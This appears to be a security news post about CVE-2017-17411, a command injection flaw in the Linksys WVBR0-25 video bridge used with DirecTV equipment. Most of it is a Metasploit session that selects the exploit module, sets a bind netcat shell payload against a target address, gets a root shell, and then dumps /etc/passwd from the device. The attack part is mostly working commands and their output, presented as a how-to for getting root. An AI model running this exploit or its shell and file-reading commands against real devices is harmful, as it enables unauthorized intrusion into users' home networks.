Recently a security researcher Ricky Lawshae from Trend Micro discover a critical vulnerability on Linksys Wireless Bridge WVBR0-25 this allows remote attackers to execute arbitrary code on vulnerable installations of Linksys WVBR0 WVBR0.
Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management portal. The issue lies in the lack of proper validation of user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges.
Getting a Root Shell on a Linksys WVBR0 25
Exploit:
exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth Metasploit module
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to “; #. This can be verified against WVBR0-25 devices running firmware < 1.0.41.
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info Name: Linksys WVBR0-25 User-Agent Command Execution Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth Platform: Unix Privileged: Yes License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2017-12-13 Provided by: HeadlessZeke Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPORT 80 yes The target port SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Payload information: Space: 1024 Description: The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect wireless Genie cable boxes to the Genie DVR, is vulnerable to OS command injection in version < 1.0.41 of the web management portal via the User-Agent header. Authentication is not required to exploit this vulnerability. References: http://cvedetails.com/cve/2017-17411/ http://www.zerodayinitiative.com/advisories/ZDI-17-973 https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat) cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat) msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat payload => cmd/unix/bind_netcat msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104 RHOST => 10.0.0.104 msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit [*] 10.0.0.104:80 - Trying to access the device ... [*] Started bind handler [*] 10.0.0.104:80 - Exploiting... [*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600 id uid=0(root) gid=0(root) ^C Abort session 1? [y/N] y [*] 10.0.0.104 - Command shell session 1 closed. Reason: User exit msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic payload => cmd/unix/generic msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd cmd => cat /etc/passwd msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit [*] 10.0.0.104:80 - Trying to access the device ... [*] 10.0.0.104:80 - Exploiting... [+] 10.0.0.104:80 - Command sent successfully [*] 10.0.0.104:80 - Command output: root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga [*] Exploit completed, but no session was created. msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
Reference:
- http://zerodayinitiative.com/advisories/ZDI-17-973/
- http://www.cve.mitre.org
- https://github.com/rapid7/metasploit-framework/pull/9336